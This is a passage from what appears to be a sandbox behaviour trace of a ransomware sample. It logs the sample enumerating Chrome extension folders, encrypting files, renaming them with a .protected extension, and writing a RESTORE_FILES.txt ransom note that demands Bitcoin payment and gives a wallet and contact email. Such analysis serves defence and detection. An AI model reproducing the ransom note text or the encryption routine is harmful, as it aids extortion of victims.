(lpString1="offers.html", lpString2="System Volume Information") returned -1 [0083.198] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html") returned 161 [0083.198] StrStrIW (lpFirst="offers.html", lpSrch=".protected") returned 0x0 [0083.198] lstrcmpW (lpString1="offers.html", lpString2="RESTORE_FILES.txt") returned -1 [0083.198] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0083.198] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0083.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.199] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html") returned 161 [0083.199] StrStrW (lpFirst="offers.html", lpSrch=".txt") returned 0x0 [0083.199] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html") returned 161 [0083.199] StrStrW (lpFirst="offers.html", lpSrch=".rar") returned 0x0 [0083.199] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html") returned 161 [0083.199] StrStrW (lpFirst="offers.html", lpSrch=".zip") returned 0x0 [0083.199] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x3b, lpOverlapped=0x0) returned 1 [0083.200] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffffc5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.200] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x3b, lpOverlapped=0x0) returned 1 [0083.200] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.200] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0083.201] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0083.201] CloseHandle (hObject=0x164) returned 1 [0083.201] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.protected") returned 171 [0083.201] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.protected")) returned 1 [0083.203] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.203] lstrcmpiW (lpString1="setup.html", lpString2="Windows") returned -1 [0083.203] lstrcmpiW (lpString1="setup.html", lpString2="Program Files") returned 1 [0083.203] lstrcmpiW (lpString1="setup.html", lpString2="Program Files (x86)") returned 1 [0083.203] lstrcmpiW (lpString1="setup.html", lpString2="$Recycle.bin") returned 1 [0083.203] lstrcmpiW (lpString1="setup.html", lpString2="System Volume Information") returned -1 [0083.203] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html") returned 160 [0083.203] StrStrIW (lpFirst="setup.html", lpSrch=".protected") returned 0x0 [0083.203] lstrcmpW (lpString1="setup.html", lpString2="RESTORE_FILES.txt") returned 1 [0083.203] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0083.203] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0083.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.204] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html") returned 160 [0083.204] StrStrW (lpFirst="setup.html", lpSrch=".txt") returned 0x0 [0083.204] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html") returned 160 [0083.204] StrStrW (lpFirst="setup.html", lpSrch=".rar") returned 0x0 [0083.204] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html") returned 160 [0083.204] StrStrW (lpFirst="setup.html", lpSrch=".zip") returned 0x0 [0083.204] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x3b, lpOverlapped=0x0) returned 1 [0083.205] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffffc5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.205] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x3b, lpOverlapped=0x0) returned 1 [0083.205] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.205] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0083.205] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0083.205] CloseHandle (hObject=0x164) returned 1 [0083.205] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.protected") returned 170 [0083.206] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.protected")) returned 1 [0083.206] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0083.206] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0083.206] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\RESTORE_FILES.txt") returned 167 [0083.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.207] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.207] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0083.208] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.208] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0083.208] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.208] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0083.208] CloseHandle (hObject=0x160) returned 1 [0083.208] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.208] lstrcmpiW (lpString1="cloud_route_details", lpString2="Windows") returned -1 [0083.208] lstrcmpiW (lpString1="cloud_route_details", lpString2="Program Files") returned -1 [0083.208] lstrcmpiW (lpString1="cloud_route_details", lpString2="Program Files (x86)") returned -1 [0083.208] lstrcmpiW (lpString1="cloud_route_details", lpString2="$Recycle.bin") returned 1 [0083.208] lstrcmpiW (lpString1="cloud_route_details", lpString2="System Volume Information") returned -1 [0083.208] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details") returned 158 [0083.208] lstrcmpW (lpString1="cloud_route_details", lpString2=".") returned 1 [0083.208] lstrcmpW (lpString1="cloud_route_details", lpString2="..") returned 1 [0083.208] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\*") returned 160 [0083.208] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0083.209] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.209] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.209] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.209] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.209] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.209] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\.") returned 160 [0083.209] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.209] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.209] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.209] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.209] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.209] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.209] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.209] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\..") returned 161 [0083.209] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.209] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.209] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.209] lstrcmpiW (lpString1="view.html", lpString2="Windows") returned -1 [0083.209] lstrcmpiW (lpString1="view.html", lpString2="Program Files") returned 1 [0083.209] lstrcmpiW (lpString1="view.html", lpString2="Program Files (x86)") returned 1 [0083.209] lstrcmpiW (lpString1="view.html", lpString2="$Recycle.bin") returned 1 [0083.209] lstrcmpiW (lpString1="view.html", lpString2="System Volume Information") returned 1 [0083.209] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html") returned 168 [0083.209] StrStrIW (lpFirst="view.html", lpSrch=".protected") returned 0x0 [0083.209] lstrcmpW (lpString1="view.html", lpString2="RESTORE_FILES.txt") returned 1 [0083.209] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0083.209] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0083.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.210] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html") returned 168 [0083.210] StrStrW (lpFirst="view.html", lpSrch=".txt") returned 0x0 [0083.210] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html") returned 168 [0083.210] StrStrW (lpFirst="view.html", lpSrch=".rar") returned 0x0 [0083.210] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html") returned 168 [0083.210] StrStrW (lpFirst="view.html", lpSrch=".zip") returned 0x0 [0083.210] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x174c, lpOverlapped=0x0) returned 1 [0083.219] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffe8b4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.219] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x174c, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x174c, lpOverlapped=0x0) returned 1 [0083.219] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.219] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0083.219] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0083.219] CloseHandle (hObject=0x164) returned 1 [0083.219] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.protected") returned 178 [0083.219] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.protected")) returned 1 [0083.220] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.220] lstrcmpiW (lpString1="view.js", lpString2="Windows") returned -1 [0083.220] lstrcmpiW (lpString1="view.js", lpString2="Program Files") returned 1 [0083.220] lstrcmpiW (lpString1="view.js", lpString2="Program Files (x86)") returned 1 [0083.220] lstrcmpiW (lpString1="view.js", lpString2="$Recycle.bin") returned 1 [0083.220] lstrcmpiW (lpString1="view.js", lpString2="System Volume Information") returned 1 [0083.220] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js") returned 166 [0083.220] StrStrIW (lpFirst="view.js", lpSrch=".protected") returned 0x0 [0083.220] lstrcmpW (lpString1="view.js", lpString2="RESTORE_FILES.txt") returned 1 [0083.221] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0083.221] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0083.221] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.222] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js") returned 166 [0083.222] StrStrW (lpFirst="view.js", lpSrch=".txt") returned 0x0 [0083.222] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js") returned 166 [0083.222] 